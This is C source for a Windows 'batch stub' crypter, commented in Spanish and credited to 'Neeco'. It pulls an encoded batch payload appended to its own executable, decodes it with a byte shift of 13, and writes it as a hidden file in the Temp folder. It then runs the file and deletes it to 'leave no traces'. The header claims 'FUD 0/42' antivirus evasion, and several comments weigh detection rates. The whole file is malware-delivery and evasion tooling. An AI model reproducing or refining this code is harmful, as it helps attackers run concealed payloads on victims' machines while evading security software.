#include <windows.h>
#include <stdio.h>
/*
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
//Batch stub - Incluye cryptacion tor 13
//Modulo de autocopia exe - no deja rastros.
//Neeco - Version 1.0
//FUD 0/42 - https://www.virustotal.com/file/204540f7def3a75fd4a8830a9c19031f5fd417b66e4c67d8527c510348c9327a/analysis/1335515677/
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
*/
int WINAPI WinMain ( HINSTANCE hThisInstance, HINSTANCE hPrevInstance,
LPSTR lpszArgument, int nCmdShow ) {
PROCESS_INFORMATION pi;
STARTUPINFO stinfo;
DWORD i, dwBytes;
char *a = "\"";
char *nuevo = (char*) GlobalAlloc (GPTR, 500 + MAX_PATH);
char *add = (char*) GlobalAlloc (GPTR, 250 );
stinfo.cb = sizeof ( STARTUPINFO );
char *appname = (char*) GlobalAlloc ( GPTR, MAX_PATH );
GetModuleFileNameA ( GetModuleHandleA ( 0L ), appname, MAX_PATH );
HANDLE file = CreateFileA ( appname, GENERIC_READ, 0, 0, OPEN_EXISTING, 0, 0 );
DWORD size = GetFileSize ( file, 0 );
char *buffer = (char*) GlobalAlloc ( GPTR, size );
char *batch = (char*) GlobalAlloc ( GPTR, size );
ReadFile ( file, buffer, size, &dwBytes, 0 );
CloseHandle ( file );
//Buscamos el buffer
for (i = 0; i<=size; i++ ) {
if ( buffer[i] == '*' && buffer[i+1] == '+' && buffer[i+2] == '*' ) {
batch = buffer + (i+3);
break;
}
}
//Sabremos si tenemos EOF agregado
if ( batch[0] == 142 || batch[0] == 0x00 ) {
ExitProcess (0);
}
//Aplicamos la cryptacion TOR13
for ( i = 0; size-(i+3); i++ ) {
batch[i] = batch[i] - 13;
}
//FUNCION AppName change %0 -
int x, count = 0;
BOOL stac = FALSE;
for ( i = 0; i<=lstrlenA(buffer); i++ ) {
if ( buffer[i] == 37 && buffer[i+1] == 48 ) {
add = buffer + i + 2;
nuevo[i-1] = 34;
CopyMemory (&nuevo[0], &buffer[0], i-1);
CopyMemory (&nuevo[lstrlenA(nuevo)], &appname[0], lstrlenA(appname));
CopyMemory (&nuevo[lstrlenA(nuevo)],&a[0],1);
CopyMemory (&nuevo[lstrlenA(nuevo)], &add[0], lstrlenA(add));
stac = TRUE;
}
}
//Esta funcion la hacemos con WINAPI - Rango de detectabilidad heuristico : 20 %
//Con lib stdio : 2,0 # fstream - 0,0
LPSTR Dir = (LPSTR) GlobalAlloc ( GPTR, MAX_PATH);
GetWindowsDirectoryA ( Dir, MAX_PATH );
lstrcatA ( Dir, "\\Temp\\tA1xcp.bat" );
HANDLE File = CreateFileA ( Dir, GENERIC_WRITE, 0, 0, CREATE_ALWAYS, 0, 0 );
if ( stac == FALSE ) {
WriteFile ( File, batch, size - (i+3), &dwBytes, 0 );
CloseHandle ( File );
} else {
WriteFile ( File, nuevo, size - (i+3) + lstrlenA(appname), &dwBytes, 0 );
CloseHandle ( File );
}
//'Lo creamos a escondidas.
SetFileAttributesA ( Dir, 0x1|0x2|0x4 );
//Abrimos el batch generado.
CreateProcess ( Dir, 0, 0, 0, FALSE, 0, 0, 0, &stinfo, &pi );
//Esperamos a que termine de ejecutarce
WaitForSingleObject ( pi.hProcess, INFINITE );
TerminateProcess ( pi.hProcess, 0 );
CloseHandle ( pi.hProcess );
CloseHandle ( pi.hThread );
//Borramos rastros de el.
SetFileAttributesA ( Dir, FILE_ATTRIBUTE_NORMAL );
//DeleteFileA ( Dir ); - Es detectada
remove ( Dir );
GlobalFree ( Dir );
GlobalFree ( appname );
GlobalFree ( nuevo ), GlobalFree ( add );
GlobalFree ( buffer ), GlobalFree ( batch );
return 0;
}